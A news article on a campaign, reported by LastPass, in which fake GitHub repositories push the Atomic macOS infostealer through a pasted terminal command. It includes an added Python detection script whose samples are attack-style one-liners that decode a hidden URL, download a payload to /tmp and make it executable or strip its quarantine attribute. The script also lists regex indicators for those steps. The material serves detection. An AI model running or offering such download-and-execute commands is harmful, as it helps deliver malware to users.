Threat actors are impersonating known brands in an ongoing, widespread campaign aimed at infecting macOS users with infostealer malware, LastPass warns.
As part of the infection chain, the hackers are relying on fraudulent GitHub repositories claiming to offer macOS software from various companies and use search engine optimization (SEO) so that links to the repositories appear at the top of search pages.
“In the case of LastPass, the fraudulent repositories redirected potential victims to a repository that downloads the Atomic infostealer malware,” LastPass says.
LastPass identified two GitHub sites impersonating its brand, which were posted on the Microsoft-owned code-sharing platform on 16 September, and which have been taken down since.
Both were posted by a user named ‘modhopmduck476’ and contained links claiming to allow users to install ‘LastPass on MacBook’, but redirected to the same malicious page.
A page claiming to offer ‘LastPass Premium on MacBook’ was redirecting to macprograms-pro[.]com, where users were instructed to copy and paste a command into a terminal window.
The command initiates a CURL request to an encoded URL, resulting in an ‘Update’ payload being downloaded to the Temp directory.
The payload was the Atomic macOS Stealer (AMOS) infostealer, which has been used in numerous attacks since 2023. In August, CrowdStrike warned of an increase in fraudulent ads delivering a variant of AMOS called SHAMOS.
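The copy-and-paste terminal command described above leaves a trace in command-line telemetry (EDR process events, shell history), which is where a defender can catch it before the payload runs. The following Python script is an added example, not code from the article or from LastPass: it scores constructed sample command lines against the traits the article names (a curl download, a base64-encoded URL, a payload dropped in a temp directory) plus two follow-on steps that are assumptions rather than something the article states (stripping the Gatekeeper quarantine attribute, marking the dropped file executable). The indicator names, the threshold and the example.invalid domain are all constructed for illustration.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field

# Indicators drawn from the article's description (curl, encoded URL, payload in Temp)
# plus two common follow-on steps (assumptions, not from the article): stripping the
# quarantine attribute and marking the dropped file executable.
INDICATORS = {
    "downloader": re.compile(r"\b(?:curl|wget)\b"),
    "base64-decode": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
    "temp-drop": re.compile(r"(?:/tmp/|\$TMPDIR|/private/tmp|/var/folders)"),
    "quarantine-strip": re.compile(r"\bxattr\s+(?:-c|-d\s+com\.apple\.quarantine)\b"),
    "exec-stage": re.compile(r"(?:\bchmod\s+\+x\b|\|\s*(?:sh|bash|zsh)\b)"),
}

# Runs of base64 alphabet long enough to hide a URL.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


@dataclass
class Finding:
    command: str
    indicators: list = field(default_factory=list)
    decoded_urls: list = field(default_factory=list)

    @property
    def score(self) -> int:
        # One point per indicator, one more if an embedded token decodes to a URL.
        return len(self.indicators) + (1 if self.decoded_urls else 0)


def decode_b64_urls(cmd: str) -> list:
    """Return any base64 tokens in cmd that decode to an http(s) URL."""
    urls = []
    for tok in B64_TOKEN.findall(cmd):
        padded = tok + "=" * (-len(tok) % 4)  # tolerate stripped padding
        try:
            text = base64.b64decode(padded, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls


def analyze(cmd: str) -> Finding:
    """Score a single recorded command line against the indicator set."""
    f = Finding(command=cmd)
    for name, pattern in INDICATORS.items():
        if pattern.search(cmd):
            f.indicators.append(name)
    f.decoded_urls = decode_b64_urls(cmd)
    return f


def triage(commands, threshold: int = 3) -> list:
    """Return findings whose score reaches the threshold, highest score first."""
    hits = [analyze(c) for c in commands]
    return sorted((h for h in hits if h.score >= threshold), key=lambda h: -h.score)


# Constructed sample command lines (not real telemetry). The encoded URL points at the
# reserved .invalid TLD so nothing here resolves.
_ENC = base64.b64encode(b"https://example.invalid/Update").decode()
SAMPLE_COMMANDS = [
    "brew install --cask some-tool",
    "curl -fsSL https://example.invalid/README.md -o README.md",
    f"echo {_ENC} | base64 -d | xargs curl -s -o /tmp/Update && chmod +x /tmp/Update",
    f"curl -s $(echo {_ENC} | base64 --decode) -o $TMPDIR/Update; xattr -c $TMPDIR/Update",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_COMMANDS):
        print(finding.score, finding.indicators, finding.decoded_urls)
        print("   ", finding.command)
```

Scoring several weak signals together, rather than alerting on curl alone, keeps ordinary developer activity (a plain curl of a README, a Homebrew install) below the threshold while the two constructed paste-style commands score 5 each; decoding the embedded token also surfaces the download URL for blocking and hunting.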
LastPass has observed the threat actors impersonating financial institutions, password managers, technology companies, AI tools, cryptocurrency wallets, and other businesses.
To evade detection, the threat actors used multiple GitHub usernames to create other fake GitHub pages, which followed a similar naming pattern, where the name of the targeted company and Mac-related terminology were used.
The campaign observed by LastPass has been ongoing since at least July, when Deriv security researcher Dhiraj Mishra warned that Homebrew users were targeted with malicious ads leading to a fake GitHub repository.
The attacks, Mishra pointed out, exploited users’ trust in Google Ads and GitHub, and installed the legitimate Homebrew tool to hide the execution of a malicious payload in the background.